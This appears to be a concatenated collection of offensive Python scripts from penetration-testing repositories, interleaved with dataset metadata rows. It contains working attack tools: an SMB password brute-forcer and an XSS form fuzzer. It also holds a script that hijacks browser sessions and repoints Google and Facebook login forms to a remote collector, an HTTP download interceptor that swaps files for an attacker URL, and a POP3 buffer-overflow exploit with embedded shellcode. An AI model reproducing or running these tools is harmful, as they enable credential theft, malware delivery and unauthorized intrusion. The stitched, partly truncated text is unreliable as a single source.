"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| 66.841823 | 248 | 0.614172 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/smb.conf")
def smb_connect(self,ip,username,password):
crack =0
try:
smb = SMBConnection('*SMBSERVER', ip)
smb.login(username,password)
smb.logoff()
crack =1
except Exception, e:
self.lock.acquire()
print "%s smb 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def smb_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.smb_connect(ip,username,password)==1:
self.lock.acquire()
printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['smb']):
printPink("crack smb now...")
print "[*] start crack smb serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['smb']:
pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop smb serice %s" % time.ctime()
print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test") | 32.833333 | 125 | 0.529363 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
msg = raw_input('Please enter the string to encode: ')
print "Your B64 encoded string is: " + msg.encode('base64') | 26 | 59 | 0.69403 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sqlite3
import optparse
def isMessageTable(iphoneDB):
try:
conn = sqlite3.connect(iphoneDB)
c = conn.cursor()
c.execute('SELECT tbl_name FROM sqlite_master \
WHERE type==\"table\";')
for row in c:
if 'message' in str(row):
return True
except:
return False
def printMessage(msgDB):
try:
conn = sqlite3.connect(msgDB)
c = conn.cursor()
c.execute('select datetime(date,\'unixepoch\'),\
address, text from message WHERE address>0;')
for row in c:
date = str(row[0])
addr = str(row[1])
text = row[2]
print '\n[+] Date: '+date+', Addr: '+addr \
+ ' Message: ' + text
except:
pass
def main():
parser = optparse.OptionParser("usage %prog "+\
"-p <iPhone Backup Directory> ")
parser.add_option('-p', dest='pathName',\
type='string',help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
else:
dirList = os.listdir(pathName)
for fileName in dirList:
iphoneDB = os.path.join(pathName, fileName)
if isMessageTable(iphoneDB):
try:
print '\n[*] --- Found Messages ---'
printMessage(iphoneDB)
except:
pass
if __name__ == '__main__':
main()
| 24.612903 | 56 | 0.516698 |
cybersecurity-penetration-testing | import mechanize
import shelve
br = mechanize.Browser()
br.set_handle_robots( False )
url = raw_input("Enter URL ")
br.set_handle_equiv(True)
br.set_handle_gzip(True)
#br.set_handle_redirect(False)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.open(url)
s = shelve.open("mohit.xss",writeback=True)
for form in br.forms():
print form
list_a =[]
list_n = []
field = int(raw_input('Enter the number of field "not readonly" '))
for i in xrange(0,field):
na = raw_input('Enter the field name, "not readonly" ')
ch = raw_input("Do you attack on this field? press Y ")
if (ch=="Y" or ch == "y"):
list_a.append(na)
else :
list_n.append(na)
br.select_form(nr=0)
p =0
flag = 'y'
while flag =="y":
br.open(url)
br.select_form(nr=0)
for i in xrange(0, len(list_a)):
att=list_a[i]
br.form[att] = s['xss'][p]
for i in xrange(0, len(list_n)):
non=list_n[i]
br.form[non] = 'aaaaaaa'
print s['xss'][p]
br.submit()
ch = raw_input("Do you continue press y ")
p = p+1
flag = ch.lower()
| 19.755102 | 67 | 0.647638 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : index.py
# @Desc : ""
from flask import Blueprint, redirect, url_for
from fuxi.views.authenticate import login_check
index = Blueprint('index', __name__)
@index.route('/index')
@login_check
def view_index():
return redirect(url_for('dashboard.view_dashboard'))
@index.route('/')
@login_check
def view_base():
return redirect(url_for('dashboard.view_dashboard'))
| 19.125 | 56 | 0.659751 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing required modules")
import scapy.all as scapy
import netfilterqueue
import subprocess
import argparse
except ModuleNotFoundError:
print("[!] Missing modules, Exiting...")
exit()
else:
print("[>] Modules successfully imported")
########################################################################
# User Defined functions
########################################################################
def nothing():
"""I said Nothing ;)"""
pass
def is_root():
"""This function will check whether the script was run as root or not"""
current_user_id = int(subprocess.check_output(["id","-u"]))
if current_user_id == 0:
return True
else:
return False
def get_arguments():
"""This function will parse arguments from command line and return"""
parser = argparse.ArgumentParser(description="All arguments are optional")
parser.add_argument("-f","--filetype",help="File type to target for (.exe for example), uses some common filetypes if not provided",dest="filetype")
parser.add_argument("-r","--replace",help="Direct download URL for the file that would be replaced with original",dest="replace")
parser.add_argument("-io","--inout",help="This argument will order the program to intercept files from INPUT and OUTPUT chain (Packets of your computer) rather than FORWARD chain",dest='io',action='store_true')
parser.add_argument("-s","--silent",help="Show less output",dest="mute",action="store_true")
parser.add_argument("-d","--display",help="Display the contents of packet before and after intercepting, (Just for depth analysis, can clutter your screen with enormous output)",action="store_true",dest="display")
options = parser.parse_args()
return options.filetype, options.replace, options.io, options.mute, options.display
def check_packet(packet):
"""This function will be called on HTTP requests to check for request for a file"""
# Check the packet for file formats
for file_format in file_formats:
# If a file format request exists in the packet
if file_format in str(packet[scapy.Raw].load):
# Add it to the record
acknowledge_list.append(packet[scapy.TCP].ack)
return file_format
def modify_packet(packet):
"""This function will be called when a response to a requested file will be discovered. It
will manipulate the response"""
acknowledge_list.remove(packet[scapy.TCP].seq)
packet[scapy.Raw].load = f"HTTP/1.1 301 Moved Permanently\nLocation: {replace_url}\n"
# Removing the checksums
try:
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
except:
pass
# Return the modified packet
return packet
def process_packet(packet):
"""This function will be called on every packet in the queue, it will process the packets"""
# Convert the packet into scapy packet
scapy_packet = scapy.IP(packet.get_payload())
# Check if the packet has Raw layer
if scapy_packet.haslayer(scapy.Raw):
try:
# to check the packet fields to determine
# HTTP request
if scapy_packet[scapy.TCP].dport == 80:
discovered_file_format = check_packet(scapy_packet)
if discovered_file_format:
print(f"[+] Interceptable {discovered_file_format} found")
# HTTP response
elif scapy_packet[scapy.TCP].sport == 80:
# If it is a response to a recorded file request
if scapy_packet[scapy.TCP].seq in acknowledge_list:
# Intercept and manipulate it and set it to original packet
print("[+] Intercepting file")
print(f"[>] Original response : {scapy_packet.show()}") if display_intercepted_packets else nothing()
modified_packet = modify_packet(scapy_packet)
print(f"[>] Manipulated response : {modified_packet.show()}") if display_intercepted_packets else nothing()
packet.set_payload(bytes(modified_packet))
except IndexError:
# If these fields doesn't exist
pass
# Let it go
packet.accept()
########################################################################
# The main function
########################################################################
# Global
acknowledge_list = [] # Variable to store the ACK of file requesuts
# Getting arguments from command line
target_filetype, replace_url, io_chain, mute, display_intercepted_packets = get_arguments()
# Checking for root privileges
if is_root():
nothing()
else:
print("[!] Please run the script as root")
exit()
# Checking and validating provided arguments
file_formats = [target_filetype] if target_filetype else [".exe", ".pdf", ".zip", ".doc", ".jpg", ".mp4"]
while not replace_url:
print() # Line break
replace_url = input("[>] Enter the direct downloadable link/URL of the replace file : ")
display_intercepted_packets = True if display_intercepted_packets else False
io_chain = True if io_chain else False
mute = True if mute else False
# Feedback
print() if not mute else nothing()
print(f"[>] Filetype/s to target : {file_formats}") if not mute else nothing()
print(f"[>] Replace file URL : {replace_url}") if not mute else nothing()
print(f"[>] Display intercepted packets : {display_intercepted_packets}") if not mute else nothing()
# Creating the queue
print()
print("[+] Creating a queue") if not mute else nothing()
if io_chain:
subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 1",shell=True)
subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 1",shell=True)
else:
subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 1",shell=True)
# Binding with the queue
queue = netfilterqueue.NetfilterQueue()
queue.bind(1,process_packet)
print("[+] Queue created and binded with program")
print() if not mute else nothing()
# Running the queue
try:
queue.run()
except KeyboardInterrupt:
print("[+] Unbinding the queue")
queue.unbind()
# Flushing the ip tables and exiting
print("[+] Flushing IP tables")
subprocess.call("iptables --flush",shell=True) | 37.676829 | 217 | 0.638127 |
cybersecurity-penetration-testing | import multiprocessing
import time
def f(x):
t = 0
while t < 10:
print "Running ", x, "-", t
t += 1
time.sleep(x)
if __name__ == '__main__':
p1 = multiprocessing.Process(target=f, args=(1,))
p2 = multiprocessing.Process(target=f, args=(2,))
p1.start()
time.sleep(0.5)
p2.start()
while True:
if not p2.is_alive():
p1.terminate()
break
print "Both processes finished"
| 18.291667 | 53 | 0.528139 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 05:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0007_nmapscan_slug_text'),
]
operations = [
migrations.RemoveField(
model_name='nmapscan',
name='slug_text',
),
migrations.AddField(
model_name='nmapscan',
name='slug',
field=models.SlugField(default='', max_length=128),
preserve_default=False,
),
]
| 22.269231 | 63 | 0.566225 |
cybersecurity-penetration-testing | import win32com.client
import time
import urlparse
import urllib
data_receiver = "http://localhost:8080/"
target_sites = {}
target_sites["www.facebook.com"] = \
{"logout_url" : None,
"logout_form" : "logout_form",
"login_form_index": 0,
"owned" : False}
target_sites["accounts.google.com"] = \
{"logout_url" : "https://accounts.google.com/Logout?hl=en&continue=https://accounts.google.com/ServiceLogin%3Fservice%3Dmail",
"logout_form" : None,
"login_form_index" : 0,
"owned" : False}
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
clsid='{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid)
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
while True:
for browser in windows:
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites:
if target_sites[url.hostname]["owned"]:
continue
# if there is an URL we can just redirect
if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document
full_doc = browser.Document.all
# iterate looking for the logout form
for i in full_doc:
try:
# find the logout form and submit it
if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
except:
pass
try:
# now we modify the login form
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
target_sites[url.hostname]["owned"] = True
except:
pass
time.sleep(5) | 29.3375 | 136 | 0.550289 |
SNAP_R | # THIS PROGRAM IS TO BE USED FOR EDUCATIONAL PURPOSES ONLY.
# CAN BE USED FOR INTERNAL PEN-TESTING, STAFF RECRUITMENT, SOCIAL ENGAGEMENT
import sklearn.pipeline
import sklearn.metrics
import sklearn.cluster
import datetime
import sklearn.metrics
import sklearn.grid_search
import sklearn.base
import sklearn.feature_extraction
def create_transformers():
return [
('created_at', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'created_at')),
('preprocessor', CreatedAtPreprocessor()),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('followers_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'followers_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('listed_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'listed_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('favourites_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'favourites_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('statuses_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'statuses_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('friends_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'friends_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('location', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_location, 'location')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_background_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_background_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_link_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_link_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_sidebar_fill_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_sidebar_fill_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_sidebar_border_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_sidebar_border_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_text_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_text_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('verified', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'verified')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('default_profile_image', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'default_profile_image')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('default_profile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'default_profile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('geo_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'geo_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('contributors_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'contributors_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('protected', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'protected')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('is_translator', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'is_translator')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('lang', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'lang')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('time_zone', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_time_zone, 'time_zone')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('has_extended_profile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'has_extended_profile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_use_background_image', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_use_background_image')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('is_translation_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'is_translation_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_background_tile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_background_tile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
]))
]
class ItemSelector(sklearn.base.BaseEstimator,
sklearn.base.TransformerMixin):
''' For data grouped by feature, select subset of data '''
def __init__(self, func, field_name=None):
self.func = func
self.field_name = field_name
def fit(self, X, y=None):
return self
def transform(self, data_dict):
return self.func(data_dict, self.field_name)
class CreatedAtPreprocessor(sklearn.base.BaseEstimator,
sklearn.base.TransformerMixin):
''' Preprocess features from created_at document '''
def fit(self, X):
return self
def transform(self, corpus):
for document in corpus:
yield self._transform_document(document)
def _transform_document(self, document,
hours_in_day=24, seconds_in_hour=3600):
current_time = datetime.datetime.now()
t_delta = current_time - self._convert(document['created_at'])
document['created_at'] = \
t_delta.days * hours_in_day * seconds_in_hour + t_delta.seconds
return document
def _convert(self, time_string):
return datetime.datetime.strptime(time_string,
"%a %b %d %H:%M:%S +0000 %Y")
def get_intfield(corpus, field_name):
for document in corpus:
yield {field_name: int(document[field_name])}
def get_field(corpus, field_name):
for document in corpus:
yield {field_name: document[field_name]}
def get_location(corpus, field_name):
for document in corpus:
if document[field_name]:
yield {field_name: 1}
else:
yield {field_name: 0}
def get_time_zone(corpus, field_name):
for document in corpus:
if document[field_name]:
yield {field_name: document[field_name]}
else:
yield {field_name: 'None'}
class Parameterize(sklearn.base.ClusterMixin):
def __init__(self, scoring=sklearn.metrics.silhouette_score, n_iter=4):
self.parameters = {
'scoring': scoring,
'n_iter': n_iter
}
def clusterer_choices(self):
parameter_distributions = {
sklearn.cluster.KMeans: {
'n_clusters': [2, 3, 4, 5],
'init': ['k-means++'],
'n_init': [10],
'max_iter': [300],
'tol': [0.0001],
'precompute_distances': ['auto']
},
sklearn.cluster.Birch: {
'threshold': [0.1, 0.50],
'branching_factor': [50],
'n_clusters': [2, 3, 4, 5],
'compute_labels': [True],
'copy': [True]
}
}
return parameter_distributions.items()
def fit(self, X, y=None):
silhouette_scores = {}
scored_models = {}
for clusterer_algo, clusterer_hyperparams in self.clusterer_choices():
for hyperparam_grid in list(sklearn.grid_search.ParameterSampler(
clusterer_hyperparams, n_iter=self.parameters['n_iter'])):
clusterer = clusterer_algo(**hyperparam_grid)
cluster_labels = clusterer.fit_predict(X)
silhouette_scores[clusterer] = \
self.parameters['scoring'](X, cluster_labels)
scored_models[clusterer] = clusterer
self.cluster_choice = scored_models[max(silhouette_scores,
key=silhouette_scores.get)]
return self
def predict(self, X, y=None):
return self.cluster_choice.predict(X)
| 40.521739 | 78 | 0.585087 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
buf = ""
buf += "\xd9\xc8\xbd\xad\x9f\x5d\x89\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x52\x31\x6a\x17\x03\x6a\x17\x83\x6f\x9b\xbf"
buf += "\x7c\x93\x4c\xbd\x7f\x6b\x8d\xa2\xf6\x8e\xbc\xe2\x6d"
buf += "\xdb\xef\xd2\xe6\x89\x03\x98\xab\x39\x97\xec\x63\x4e"
buf += "\x10\x5a\x52\x61\xa1\xf7\xa6\xe0\x21\x0a\xfb\xc2\x18"
buf += "\xc5\x0e\x03\x5c\x38\xe2\x51\x35\x36\x51\x45\x32\x02"
buf += "\x6a\xee\x08\x82\xea\x13\xd8\xa5\xdb\x82\x52\xfc\xfb"
buf += "\x25\xb6\x74\xb2\x3d\xdb\xb1\x0c\xb6\x2f\x4d\x8f\x1e"
buf += "\x7e\xae\x3c\x5f\x4e\x5d\x3c\x98\x69\xbe\x4b\xd0\x89"
buf += "\x43\x4c\x27\xf3\x9f\xd9\xb3\x53\x6b\x79\x1f\x65\xb8"
buf += "\x1c\xd4\x69\x75\x6a\xb2\x6d\x88\xbf\xc9\x8a\x01\x3e"
buf += "\x1d\x1b\x51\x65\xb9\x47\x01\x04\x98\x2d\xe4\x39\xfa"
buf += "\x8d\x59\x9c\x71\x23\x8d\xad\xd8\x2c\x62\x9c\xe2\xac"
buf += "\xec\x97\x91\x9e\xb3\x03\x3d\x93\x3c\x8a\xba\xd4\x16"
buf += "\x6a\x54\x2b\x99\x8b\x7d\xe8\xcd\xdb\x15\xd9\x6d\xb0"
buf += "\xe5\xe6\xbb\x17\xb5\x48\x14\xd8\x65\x29\xc4\xb0\x6f"
buf += "\xa6\x3b\xa0\x90\x6c\x54\x4b\x6b\xe7\x9b\x24\x89\x67"
buf += "\x73\x37\x6d\x99\xd8\xbe\x8b\xf3\xf0\x96\x04\x6c\x68"
buf += "\xb3\xde\x0d\x75\x69\x9b\x0e\xfd\x9e\x5c\xc0\xf6\xeb"
buf += "\x4e\xb5\xf6\xa1\x2c\x10\x08\x1c\x58\xfe\x9b\xfb\x98"
buf += "\x89\x87\x53\xcf\xde\x76\xaa\x85\xf2\x21\x04\xbb\x0e"
buf += "\xb7\x6f\x7f\xd5\x04\x71\x7e\x98\x31\x55\x90\x64\xb9"
buf += "\xd1\xc4\x38\xec\x8f\xb2\xfe\x46\x7e\x6c\xa9\x35\x28"
buf += "\xf8\x2c\x76\xeb\x7e\x31\x53\x9d\x9e\x80\x0a\xd8\xa1"
buf += "\x2d\xdb\xec\xda\x53\x7b\x12\x31\xd0\x8b\x59\x1b\x71"
buf += "\x04\x04\xce\xc3\x49\xb7\x25\x07\x74\x34\xcf\xf8\x83"
buf += "\x24\xba\xfd\xc8\xe2\x57\x8c\x41\x87\x57\x23\x61\x82"
buffer='A'*2606 + '\x8f\x35\x4a\x5f' + "\x90"*8 +buf
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
#print str(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER root \r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + buffer + '\r\n')
#data=s.recv(1024)
#print str(data)
print "done"
#s.send('QUIT\r\n')
s.close()
| 35.885246 | 61 | 0.650956 |
cybersecurity-penetration-testing | import subprocess
import sys
ipfile = sys.argv[1]
IPs = open(ipfile, "r")
output = open("sslscan.csv", "w+")
for IP in IPs:
try:
command = "sslscan "+IP
ciphers = subprocess.check_output(command.split())
for line in ciphers.splitlines():
if "Accepted" in line:
output.write(IP+","+line.split()[1]+","+line.split()[4]+","+line.split()[2]+"\r")
except:
pass | 18.947368 | 85 | 0.632275 |
cybersecurity-penetration-testing | import exif_parser
import id3_parser
import office_parser | 18.333333 | 20 | 0.859649 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Penetration_Testing | #!/usr/bin/python
'''
Caesar Cipher encryption and decryption.
'''
import sys
def getOption():
do = raw_input("Do you wish to encrypt or decrypt a message?\n").lower()
if do in "encrypt e decrypt d".split():
return do
elif do in "No no Quit quit exit Exit".split():
sys.exit(0)
else:
print "Enter either 'encrypt' or 'e' or 'decrypt' or 'd'."
def getMessage():
print "Enter your message:"
return raw_input()
def getKey():
MAX_KEY_SIZE = 26
key = 0
print "Enter the key number (1-{})".format(MAX_KEY_SIZE)
key = int(raw_input())
if key >= 1 and key <= MAX_KEY_SIZE:
return key
def getConvertedMessage(do, message, key):
if do[0] == 'd':
key = -key
converted = ""
for symbol in message:
if symbol.isalpha():
num = ord(symbol)
num += key
if symbol.isupper():
if num > ord('Z'):
num -= 26
elif num < ord('A'):
num += 26
elif symbol.islower():
if num > ord('z'):
num -= 26
elif num < ord('a'):
num += 26
converted += chr(num)
else:
converted += symbol
return converted
do = getOption()
message = getMessage()
key = getKey()
print "Your converted text is:"
print getConvertedMessage(do, message, key)
| 15.887324 | 73 | 0.616027 |
Ethical-Hacking-Scripts | import subprocess, re
item = subprocess.run(["netsh","wlan","show","profiles"],capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles",i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh","wlan","show","profiles",i,"key=clear"],capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)\r",item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
print(main_msg) | 40.833333 | 112 | 0.60319 |
cybersecurity-penetration-testing | from datetime import datetime
import os
from time import gmtime, strftime
from PIL import Image
import processors
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts parses embedded EXIF metadata from compatible objects'
def exifParser(filename):
"""
The exifParser function confirms the file type and sends it to be processed.
:param filename: name of the file potentially containing EXIF metadata.
:return: A dictionary from getTags, containing the embedded EXIF metadata.
"""
# JPEG signatures
signatures = ['ffd8ffdb','ffd8ffe0', 'ffd8ffe1', 'ffd8ffe2', 'ffd8ffe3',
'ffd8ffe8']
if processors.utility.checkHeader(filename, signatures, 4) == True:
return getTags(filename)
else:
print 'File signature does not match known JPEG signatures.'
raise TypeError('File signature does not match JPEG object.')
def getTags(filename):
"""
The getTags function extracts the EXIF metadata from the data object.
:param filename: the path and name to the data object.
:return: tags and headers, tags is a dictionary containing EXIF metadata and headers are the
order of keys for the CSV output.
"""
# Set up CSV headers
headers = ['Path', 'Name', 'Size', 'Filesystem CTime', 'Filesystem MTime', 'Original Date', 'Digitized Date',
'Make', 'Model', 'Software', 'Latitude', 'Latitude Reference', 'Longitude', 'Longitude Reference',
